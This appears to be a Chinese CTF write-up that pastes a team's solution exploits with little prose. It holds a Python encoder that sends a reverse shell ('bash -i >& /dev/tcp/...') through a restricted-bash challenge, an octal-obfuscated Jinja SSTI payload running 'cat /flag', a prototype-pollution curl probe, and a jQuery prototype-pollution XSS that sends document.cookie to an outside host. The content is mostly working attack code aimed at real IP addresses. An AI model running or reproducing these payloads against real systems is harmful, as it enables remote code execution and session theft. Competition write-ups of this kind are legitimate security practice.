被队友带躺了,这里复制下 呜呜呜大师傅们太猛了8
https://hack.more.systems/writeup/2017/12/30/34c3ctf-minbashmaxfun/
#from pwn import * import sys import requests url = "http://47.108.162.43:30023" def send_cmd(cmd): #r = remote("35.198.107.77", 1337) payload = build_payload(cmd) data = { "cmd":payload } req= requests.post(url,data=data) print(req.text) def nextpid(r): r.sendline(b"$$") r.readuntil(b"bash: ") pid = int(r.readuntil(b":")[:-1], 10) print("current pid: {}".format(pid)) r.readline() return pid + 1 base_payload = rb"${0}<<<${0}\<\<\<${0}\\\<\\\<\\\<${0}\\\\\\\<\\\\\\\<\\\\\\\<\\\\\\\$\\\\\\\'" base_payload_end = rb"\\\\\\\'" def build_payload(string): bstr = string.encode() payload = base_payload for char in bstr: payload += encode_character(char) payload += base_payload_end return payload def encode_character(byte): octals = "{:o}".format(byte) payload = rb"\\\\\\\\" for octal in octals: num = int(octal, 8) if num == 0: payload += rb"$#" elif num == 1: payload += rb"${##}" else: payload += rb"\\\$\\\(\\\(" payload += rb"\$\'\\$$\'".join([rb"${##}" for i in range(num)]) payload += rb"\\\)\\\)" return payload #while True: cmd = "bash -i >& /dev/tcp/132.232.82.54/9998 0>&1" send_cmd
import sys

# Prefix of the payload: a here-string chain ($0<<<$0\<\<\<) in the style of the
# 34c3 minbashmaxfun writeup linked above; each argv character is appended as
# an escaped octal character escape whose digits are built from ${##} and $#.
start=r"$0<<<$0\<\<\<"
for i in sys.argv[1]:
    # ord -> octal string -> that string read as a decimal int -> binary digits,
    # then '1' -> ${##} and '0' -> $#.
    # NOTE(review): on Python 3 oct() returns '0o...', so int(oct(...)) raises
    # ValueError here; the conversion only works under Python 2, where oct()
    # yields e.g. '0154'.
    payload=str(bin(int(oct(ord(i)))))[2:].replace('1','${##}').replace('0','$#')
    # Wrap the bits in a base-2 arithmetic expansion ($((${##}<<${##})) is 2)
    # inside an escaped $'\NNN' so the shell reads them back as the octal digits.
    start+=r"$\'\\$(($((${##}<<${##}))#"+payload+r"))\'"
print(start)
#python exp.py "ls>1.txt"
http://47.108.162.43:30023/test?url={%print%0a(lipsum|attr("\137\137\147\154\157\142\141\154\163\137\137"))|attr("\137\137\147\145\164\151\164\145\155\137\137")("\137\137\142\165\151\154\164\151\156\163\137\137")|attr("\137\137\147\145\164\151\164\145\155\137\137")("\145\166\141\154")("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\160\157\160\145\156\50\47\143\141\164\40\57\146\154\141\147\47\51\56\162\145\141\144\50\51")%}
http://47.108.162.43:30023/app.js
http://47.108.162.43:30023/package.json
https://github.com/NeSE-Team/XNUCA2020Qualifier/tree/main/Web/oooooooldjs
# POSTs a JSON body whose top-level key is __proto__ to the challenge root
# (appears to be a prototype-pollution probe for the linked oooooooldjs challenge).
# NOTE(review): as pasted the body is not valid JSON -- ["system_open": "yes"]
# is an array literal containing a key/value pair -- so this line may not be
# exactly what was sent.
curl -vv --header 'Content-type: application/json' -d '{"__proto__": ["system_open": "yes"]}' http://47.108.162.43:30023/
https://twitter.com/S1r1u5_/status/1328371034064515077
{"__proto__":{"preventDefault":"x","handleObj":"x","delegateTarget":"<img/src/onerror=alert(1337)>"}}
http://47.108.162.43:3000/?data={%22__proto__%22:{%22preventDefault%22:%22x%22,%22handleObj%22:%22x%22,%22delegateTarget%22:%22%3Cimg/src/onerror=fetch(%27http://132.232.82.54:9999/?flag%3d%27%2bdocument.cookie)%3E%22}}
然后出题人找了下，说是非预期，等一手预期解